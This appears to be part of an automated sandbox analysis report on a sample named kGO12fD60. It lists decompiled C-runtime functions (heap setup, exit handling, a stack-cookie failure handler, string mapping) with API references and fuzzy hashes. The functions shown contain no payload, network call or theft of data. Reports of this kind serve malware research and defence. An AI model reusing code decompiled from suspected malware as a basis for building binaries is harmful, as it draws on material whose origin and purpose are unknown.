                                                                                                                                                                                                        • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2591292051-0
                                                                                                                                                                                                        • Opcode ID: 099839db8e65bdb9f9fa38d60dec7941dad3f75cdcf9a906fe49d4db92e23a0f
                                                                                                                                                                                                        • Instruction ID: 4f65476bce899f32584817b41e308cab7aa3c8d4d8bf0d35cde34ad6d48f5359
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 099839db8e65bdb9f9fa38d60dec7941dad3f75cdcf9a906fe49d4db92e23a0f
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2B31ABB4D012189FCB14CFAAD984ADEFBB5EF49314F10942AE815B7340D778A901CFA4
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 205 40d534-40d556 HeapCreate 206 40d558-40d559 205->206 207 40d55a-40d563 205->207
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E0040D534(intOrPtr _a4) {
                                                                                                                                                                                                        				void* _t6;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                                                                                                                                                                                                        				 *0x4234b4 = _t6;
                                                                                                                                                                                                        				if(_t6 != 0) {
                                                                                                                                                                                                        					 *0x4250b0 = 1;
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					return _t6;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}





                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 0040D549
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.401764735.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.000000000044D000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_kGO12fD60.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateHeap
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 10892065-0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 208 40ea0a-40ea16 call 40e8de 210 40ea1b-40ea1f 208->210
                                                                                                                                                                                                        C-Code - Quality: 25%
                                                                                                                                                                                                        			E0040EA0A(intOrPtr _a4) {
                                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                                        				void* _t2;
                                                                                                                                                                                                        				void* _t3;
                                                                                                                                                                                                        				void* _t4;
                                                                                                                                                                                                        				void* _t5;
                                                                                                                                                                                                        				void* _t8;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_push(0);
                                                                                                                                                                                                        				_push(0);
                                                                                                                                                                                                        				_push(_a4);
                                                                                                                                                                                                        				_t2 = E0040E8DE(_t3, _t4, _t5, _t8); // executed
                                                                                                                                                                                                        				return _t2;
                                                                                                                                                                                                        			}










                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • _doexit.LIBCMT ref: 0040EA16
                                                                                                                                                                                                          • Part of subcall function 0040E8DE: __lock.LIBCMT ref: 0040E8EC
                                                                                                                                                                                                          • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E923
                                                                                                                                                                                                          • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E938
                                                                                                                                                                                                          • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E962
                                                                                                                                                                                                          • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E978
                                                                                                                                                                                                          • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E985
                                                                                                                                                                                                          • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9B4
                                                                                                                                                                                                          • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9C4
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.401764735.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.000000000044D000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_kGO12fD60.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: __decode_pointer$__initterm$__lock_doexit
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1597249276-0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 85%
                                                                                                                                                                                                        			E0040CE09(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                                                                                                                                                                        				intOrPtr _v0;
                                                                                                                                                                                                        				void* _v804;
                                                                                                                                                                                                        				intOrPtr _v808;
                                                                                                                                                                                                        				intOrPtr _v812;
                                                                                                                                                                                                        				intOrPtr _t6;
                                                                                                                                                                                                        				intOrPtr _t11;
                                                                                                                                                                                                        				intOrPtr _t12;
                                                                                                                                                                                                        				intOrPtr _t13;
                                                                                                                                                                                                        				long _t17;
                                                                                                                                                                                                        				intOrPtr _t21;
                                                                                                                                                                                                        				intOrPtr _t22;
                                                                                                                                                                                                        				intOrPtr _t25;
                                                                                                                                                                                                        				intOrPtr _t26;
                                                                                                                                                                                                        				intOrPtr _t27;
                                                                                                                                                                                                        				intOrPtr* _t31;
                                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t27 = __esi;
                                                                                                                                                                                                        				_t26 = __edi;
                                                                                                                                                                                                        				_t25 = __edx;
                                                                                                                                                                                                        				_t22 = __ecx;
                                                                                                                                                                                                        				_t21 = __ebx;
                                                                                                                                                                                                        				_t6 = __eax;
                                                                                                                                                                                                        				_t34 = _t22 -  *0x422234; // 0xe46f3cd8
                                                                                                                                                                                                        				if(_t34 == 0) {
                                                                                                                                                                                                        					asm("repe ret");
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				 *0x423b98 = _t6;
                                                                                                                                                                                                        				 *0x423b94 = _t22;
                                                                                                                                                                                                        				 *0x423b90 = _t25;
                                                                                                                                                                                                        				 *0x423b8c = _t21;
                                                                                                                                                                                                        				 *0x423b88 = _t27;
                                                                                                                                                                                                        				 *0x423b84 = _t26;
                                                                                                                                                                                                        				 *0x423bb0 = ss;
                                                                                                                                                                                                        				 *0x423ba4 = cs;
                                                                                                                                                                                                        				 *0x423b80 = ds;
                                                                                                                                                                                                        				 *0x423b7c = es;
                                                                                                                                                                                                        				 *0x423b78 = fs;
                                                                                                                                                                                                        				 *0x423b74 = gs;
                                                                                                                                                                                                        				asm("pushfd");
                                                                                                                                                                                                        				_pop( *0x423ba8);
                                                                                                                                                                                                        				 *0x423b9c =  *_t31;
                                                                                                                                                                                                        				 *0x423ba0 = _v0;
                                                                                                                                                                                                        				 *0x423bac =  &_a4;
                                                                                                                                                                                                        				 *0x423ae8 = 0x10001;
                                                                                                                                                                                                        				_t11 =  *0x423ba0; // 0x0
                                                                                                                                                                                                        				 *0x423a9c = _t11;
                                                                                                                                                                                                        				 *0x423a90 = 0xc0000409;
                                                                                                                                                                                                        				 *0x423a94 = 1;
                                                                                                                                                                                                        				_t12 =  *0x422234; // 0xe46f3cd8
                                                                                                                                                                                                        				_v812 = _t12;
                                                                                                                                                                                                        				_t13 =  *0x422238; // 0x1b90c327
                                                                                                                                                                                                        				_v808 = _t13;
                                                                                                                                                                                                        				 *0x423ae0 = IsDebuggerPresent();
                                                                                                                                                                                                        				_push(1);
                                                                                                                                                                                                        				E004138FC(_t14);
                                                                                                                                                                                                        				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                        				_t17 = UnhandledExceptionFilter(0x41fb80);
                                                                                                                                                                                                        				if( *0x423ae0 == 0) {
                                                                                                                                                                                                        					_push(1);
                                                                                                                                                                                                        					E004138FC(_t17);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                                                        			}




















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 004136F4
                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
                                                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
                                                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 00413737
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.401764735.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.000000000044D000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_kGO12fD60.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2579439406-0
                                                                                                                                                                                                        • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                                                                                        • Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E0040ADB0(intOrPtr* __ecx) {
                                                                                                                                                                                                        				void* _t5;
                                                                                                                                                                                                        				intOrPtr* _t11;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t11 = __ecx;
                                                                                                                                                                                                        				_t5 =  *(__ecx + 8);
                                                                                                                                                                                                        				 *__ecx = 0x41eff0;
                                                                                                                                                                                                        				if(_t5 != 0) {
                                                                                                                                                                                                        					_t5 =  *((intOrPtr*)( *((intOrPtr*)( *_t5 + 8))))(_t5);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if( *(_t11 + 0xc) != 0) {
                                                                                                                                                                                                        					_t5 = GetProcessHeap();
                                                                                                                                                                                                        					if(_t5 != 0) {
                                                                                                                                                                                                        						return HeapFree(_t5, 0,  *(_t11 + 0xc));
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t5;
                                                                                                                                                                                                        			}






                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetProcessHeap.KERNEL32 ref: 0040ADD0
                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.401764735.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.000000000044D000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_kGO12fD60.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Heap$FreeProcess
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3859560861-0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                                                        			E00417081(short* __ecx, int _a4, signed int _a8, char* _a12, int _a16, char* _a20, int _a24, int _a28, intOrPtr _a32) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				int _v12;
                                                                                                                                                                                                        				int _v16;
                                                                                                                                                                                                        				int _v20;
                                                                                                                                                                                                        				intOrPtr _v24;
                                                                                                                                                                                                        				void* _v36;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                                        				signed int _t110;
                                                                                                                                                                                                        				intOrPtr _t112;
                                                                                                                                                                                                        				intOrPtr _t113;
                                                                                                                                                                                                        				short* _t115;
                                                                                                                                                                                                        				short* _t116;
                                                                                                                                                                                                        				char* _t120;
                                                                                                                                                                                                        				short* _t121;
                                                                                                                                                                                                        				short* _t123;
                                                                                                                                                                                                        				short* _t127;
                                                                                                                                                                                                        				int _t128;
                                                                                                                                                                                                        				short* _t141;
                                                                                                                                                                                                        				signed int _t144;
                                                                                                                                                                                                        				void* _t146;
                                                                                                                                                                                                        				short* _t147;
                                                                                                                                                                                                        				signed int _t150;
                                                                                                                                                                                                        				short* _t153;
                                                                                                                                                                                                        				char* _t157;
                                                                                                                                                                                                        				int _t160;
                                                                                                                                                                                                        				long _t162;
                                                                                                                                                                                                        				signed int _t174;
                                                                                                                                                                                                        				signed int _t178;
                                                                                                                                                                                                        				signed int _t179;
                                                                                                                                                                                                        				int _t182;
                                                                                                                                                                                                        				short* _t184;
                                                                                                                                                                                                        				signed int _t186;
                                                                                                                                                                                                        				signed int _t188;
                                                                                                                                                                                                        				short* _t189;
                                                                                                                                                                                                        				int _t191;
                                                                                                                                                                                                        				intOrPtr _t194;
                                                                                                                                                                                                        				int _t207;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t110 =  *0x422234; // 0xe46f3cd8
                                                                                                                                                                                                        				_v8 = _t110 ^ _t188;
                                                                                                                                                                                                        				_t184 = __ecx;
                                                                                                                                                                                                        				_t194 =  *0x423e7c; // 0x1
                                                                                                                                                                                                        				if(_t194 == 0) {
                                                                                                                                                                                                        					_t182 = 1;
                                                                                                                                                                                                        					if(LCMapStringW(0, 0x100, 0x420398, 1, 0, 0) == 0) {
                                                                                                                                                                                                        						_t162 = GetLastError();
                                                                                                                                                                                                        						__eflags = _t162 - 0x78;
                                                                                                                                                                                                        						if(_t162 == 0x78) {
                                                                                                                                                                                                        							 *0x423e7c = 2;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						 *0x423e7c = 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_a16 <= 0) {
                                                                                                                                                                                                        					L13:
                                                                                                                                                                                                        					_t112 =  *0x423e7c; // 0x1
                                                                                                                                                                                                        					if(_t112 == 2 || _t112 == 0) {
                                                                                                                                                                                                        						_v16 = 0;
                                                                                                                                                                                                        						_v20 = 0;
                                                                                                                                                                                                        						__eflags = _a4;
                                                                                                                                                                                                        						if(_a4 == 0) {
                                                                                                                                                                                                        							_a4 =  *((intOrPtr*)( *_t184 + 0x14));
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags = _a28;
                                                                                                                                                                                                        						if(_a28 == 0) {
                                                                                                                                                                                                        							_a28 =  *((intOrPtr*)( *_t184 + 4));
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t113 = E00417A20(0, _t179, _t182, _t184, _a4);
                                                                                                                                                                                                        						_v24 = _t113;
                                                                                                                                                                                                        						__eflags = _t113 - 0xffffffff;
                                                                                                                                                                                                        						if(_t113 != 0xffffffff) {
                                                                                                                                                                                                        							__eflags = _t113 - _a28;
                                                                                                                                                                                                        							if(_t113 == _a28) {
                                                                                                                                                                                                        								_t184 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
                                                                                                                                                                                                        								L78:
                                                                                                                                                                                                        								__eflags = _v16;
                                                                                                                                                                                                        								if(__eflags != 0) {
                                                                                                                                                                                                        									_push(_v16);
                                                                                                                                                                                                        									E0040B6B5(0, _t182, _t184, __eflags);
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t115 = _v20;
                                                                                                                                                                                                        								__eflags = _t115;
                                                                                                                                                                                                        								if(_t115 != 0) {
                                                                                                                                                                                                        									__eflags = _a20 - _t115;
                                                                                                                                                                                                        									if(__eflags != 0) {
                                                                                                                                                                                                        										_push(_t115);
                                                                                                                                                                                                        										E0040B6B5(0, _t182, _t184, __eflags);
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t116 = _t184;
                                                                                                                                                                                                        								goto L84;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t120 = E00417A69(_t179, _a28, _t113, _a12,  &_a16, 0, 0);
                                                                                                                                                                                                        							_t191 =  &(_t189[0xc]);
                                                                                                                                                                                                        							_v16 = _t120;
                                                                                                                                                                                                        							__eflags = _t120;
                                                                                                                                                                                                        							if(_t120 == 0) {
                                                                                                                                                                                                        								goto L58;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t121 = LCMapStringA(_a4, _a8, _t120, _a16, 0, 0);
                                                                                                                                                                                                        							_v12 = _t121;
                                                                                                                                                                                                        							__eflags = _t121;
                                                                                                                                                                                                        							if(__eflags != 0) {
                                                                                                                                                                                                        								if(__eflags <= 0) {
                                                                                                                                                                                                        									L71:
                                                                                                                                                                                                        									_t182 = 0;
                                                                                                                                                                                                        									__eflags = 0;
                                                                                                                                                                                                        									L72:
                                                                                                                                                                                                        									__eflags = _t182;
                                                                                                                                                                                                        									if(_t182 == 0) {
                                                                                                                                                                                                        										goto L62;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									E0040BA30(_t182, _t182, 0, _v12);
                                                                                                                                                                                                        									_t123 = LCMapStringA(_a4, _a8, _v16, _a16, _t182, _v12);
                                                                                                                                                                                                        									_v12 = _t123;
                                                                                                                                                                                                        									__eflags = _t123;
                                                                                                                                                                                                        									if(_t123 != 0) {
                                                                                                                                                                                                        										_t186 = E00417A69(_t179, _v24, _a28, _t182,  &_v12, _a20, _a24);
                                                                                                                                                                                                        										_v20 = _t186;
                                                                                                                                                                                                        										asm("sbb esi, esi");
                                                                                                                                                                                                        										_t184 =  ~_t186 & _v12;
                                                                                                                                                                                                        										__eflags = _t184;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t184 = 0;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									E004147AE(_t182);
                                                                                                                                                                                                        									goto L78;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								__eflags = _t121 - 0xffffffe0;
                                                                                                                                                                                                        								if(_t121 > 0xffffffe0) {
                                                                                                                                                                                                        									goto L71;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t127 =  &(_t121[4]);
                                                                                                                                                                                                        								__eflags = _t127 - 0x400;
                                                                                                                                                                                                        								if(_t127 > 0x400) {
                                                                                                                                                                                                        									_t128 = E0040B84D(0, _t179, _t182, _t127);
                                                                                                                                                                                                        									__eflags = _t128;
                                                                                                                                                                                                        									if(_t128 != 0) {
                                                                                                                                                                                                        										 *_t128 = 0xdddd;
                                                                                                                                                                                                        										_t128 = _t128 + 8;
                                                                                                                                                                                                        										__eflags = _t128;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t182 = _t128;
                                                                                                                                                                                                        									goto L72;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								E0040CFB0(_t127);
                                                                                                                                                                                                        								_t182 = _t191;
                                                                                                                                                                                                        								__eflags = _t182;
                                                                                                                                                                                                        								if(_t182 == 0) {
                                                                                                                                                                                                        									goto L62;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								 *_t182 = 0xcccc;
                                                                                                                                                                                                        								_t182 = _t182 + 8;
                                                                                                                                                                                                        								goto L72;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							L62:
                                                                                                                                                                                                        							_t184 = 0;
                                                                                                                                                                                                        							goto L78;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							goto L58;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						if(_t112 != 1) {
                                                                                                                                                                                                        							L58:
                                                                                                                                                                                                        							_t116 = 0;
                                                                                                                                                                                                        							L84:
                                                                                                                                                                                                        							return E0040CE09(_t116, 0, _v8 ^ _t188, _t179, _t182, _t184);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_v12 = 0;
                                                                                                                                                                                                        						if(_a28 == 0) {
                                                                                                                                                                                                        							_a28 =  *((intOrPtr*)( *_t184 + 4));
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t184 = MultiByteToWideChar;
                                                                                                                                                                                                        						_t182 = MultiByteToWideChar(_a28, 1 + (0 | _a32 != 0x00000000) * 8, _a12, _a16, 0, 0);
                                                                                                                                                                                                        						_t207 = _t182;
                                                                                                                                                                                                        						if(_t207 == 0) {
                                                                                                                                                                                                        							goto L58;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							if(_t207 <= 0) {
                                                                                                                                                                                                        								L28:
                                                                                                                                                                                                        								_v16 = 0;
                                                                                                                                                                                                        								L29:
                                                                                                                                                                                                        								if(_v16 == 0) {
                                                                                                                                                                                                        									goto L58;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								if(MultiByteToWideChar(_a28, 1, _a12, _a16, _v16, _t182) == 0) {
                                                                                                                                                                                                        									L52:
                                                                                                                                                                                                        									E004147AE(_v16);
                                                                                                                                                                                                        									_t116 = _v12;
                                                                                                                                                                                                        									goto L84;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t184 = LCMapStringW;
                                                                                                                                                                                                        								_t174 = LCMapStringW(_a4, _a8, _v16, _t182, 0, 0);
                                                                                                                                                                                                        								_v12 = _t174;
                                                                                                                                                                                                        								if(_t174 == 0) {
                                                                                                                                                                                                        									goto L52;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								if((_a8 & 0x00000400) == 0) {
                                                                                                                                                                                                        									__eflags = _t174;
                                                                                                                                                                                                        									if(_t174 <= 0) {
                                                                                                                                                                                                        										L44:
                                                                                                                                                                                                        										_t184 = 0;
                                                                                                                                                                                                        										__eflags = 0;
                                                                                                                                                                                                        										L45:
                                                                                                                                                                                                        										__eflags = _t184;
                                                                                                                                                                                                        										if(_t184 != 0) {
                                                                                                                                                                                                        											_t141 = LCMapStringW(_a4, _a8, _v16, _t182, _t184, _v12);
                                                                                                                                                                                                        											__eflags = _t141;
                                                                                                                                                                                                        											if(_t141 != 0) {
                                                                                                                                                                                                        												_push(0);
                                                                                                                                                                                                        												_push(0);
                                                                                                                                                                                                        												__eflags = _a24;
                                                                                                                                                                                                        												if(_a24 != 0) {
                                                                                                                                                                                                        													_push(_a24);
                                                                                                                                                                                                        													_push(_a20);
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													_push(0);
                                                                                                                                                                                                        													_push(0);
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												_v12 = WideCharToMultiByte(_a28, 0, _t184, _v12, ??, ??, ??, ??);
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											E004147AE(_t184);
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										goto L52;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t144 = 0xffffffe0;
                                                                                                                                                                                                        									_t179 = _t144 % _t174;
                                                                                                                                                                                                        									__eflags = _t144 / _t174 - 2;
                                                                                                                                                                                                        									if(_t144 / _t174 < 2) {
                                                                                                                                                                                                        										goto L44;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t52 = _t174 + 8; // 0x8
                                                                                                                                                                                                        									_t146 = _t174 + _t52;
                                                                                                                                                                                                        									__eflags = _t146 - 0x400;
                                                                                                                                                                                                        									if(_t146 > 0x400) {
                                                                                                                                                                                                        										_t147 = E0040B84D(0, _t179, _t182, _t146);
                                                                                                                                                                                                        										__eflags = _t147;
                                                                                                                                                                                                        										if(_t147 != 0) {
                                                                                                                                                                                                        											 *_t147 = 0xdddd;
                                                                                                                                                                                                        											_t147 =  &(_t147[4]);
                                                                                                                                                                                                        											__eflags = _t147;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_t184 = _t147;
                                                                                                                                                                                                        										goto L45;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									E0040CFB0(_t146);
                                                                                                                                                                                                        									_t184 = _t189;
                                                                                                                                                                                                        									__eflags = _t184;
                                                                                                                                                                                                        									if(_t184 == 0) {
                                                                                                                                                                                                        										goto L52;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									 *_t184 = 0xcccc;
                                                                                                                                                                                                        									_t184 =  &(_t184[4]);
                                                                                                                                                                                                        									goto L45;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								if(_a24 != 0 && _t174 <= _a24) {
                                                                                                                                                                                                        									LCMapStringW(_a4, _a8, _v16, _t182, _a20, _a24);
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								goto L52;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t150 = 0xffffffe0;
                                                                                                                                                                                                        							_t179 = _t150 % _t182;
                                                                                                                                                                                                        							if(_t150 / _t182 < 2) {
                                                                                                                                                                                                        								goto L28;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t25 = _t182 + 8; // 0x8
                                                                                                                                                                                                        							_t152 = _t182 + _t25;
                                                                                                                                                                                                        							if(_t182 + _t25 > 0x400) {
                                                                                                                                                                                                        								_t153 = E0040B84D(0, _t179, _t182, _t152);
                                                                                                                                                                                                        								__eflags = _t153;
                                                                                                                                                                                                        								if(_t153 == 0) {
                                                                                                                                                                                                        									L27:
                                                                                                                                                                                                        									_v16 = _t153;
                                                                                                                                                                                                        									goto L29;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								 *_t153 = 0xdddd;
                                                                                                                                                                                                        								L26:
                                                                                                                                                                                                        								_t153 =  &(_t153[4]);
                                                                                                                                                                                                        								goto L27;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							E0040CFB0(_t152);
                                                                                                                                                                                                        							_t153 = _t189;
                                                                                                                                                                                                        							if(_t153 == 0) {
                                                                                                                                                                                                        								goto L27;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							 *_t153 = 0xcccc;
                                                                                                                                                                                                        							goto L26;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t178 = _a16;
                                                                                                                                                                                                        				_t157 = _a12;
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					_t178 = _t178 - 1;
                                                                                                                                                                                                        					if( *_t157 == 0) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t157 =  &(_t157[1]);
                                                                                                                                                                                                        					if(_t178 != 0) {
                                                                                                                                                                                                        						continue;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t178 = _t178 | 0xffffffff;
                                                                                                                                                                                                        					break;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t160 = _a16 - _t178 - 1;
                                                                                                                                                                                                        				if(_t160 < _a16) {
                                                                                                                                                                                                        					_t160 = _t160 + 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_a16 = _t160;
                                                                                                                                                                                                        				goto L13;
                                                                                                                                                                                                        			}











































                                                                                                                                                                                                        0x004172ec
                                                                                                                                                                                                        0x004172ec
                                                                                                                                                                                                        0x00417414
                                                                                                                                                                                                        0x00417425
                                                                                                                                                                                                        0x00417425
                                                                                                                                                                                                        0x00417120
                                                                                                                                                                                                        0x00417126
                                                                                                                                                                                                        0x0041712d
                                                                                                                                                                                                        0x0041712d
                                                                                                                                                                                                        0x00417130
                                                                                                                                                                                                        0x00417153
                                                                                                                                                                                                        0x00417155
                                                                                                                                                                                                        0x00417157
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0041715d
                                                                                                                                                                                                        0x0041715d
                                                                                                                                                                                                        0x004171a2
                                                                                                                                                                                                        0x004171a2
                                                                                                                                                                                                        0x004171a5
                                                                                                                                                                                                        0x004171a8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x004171c1
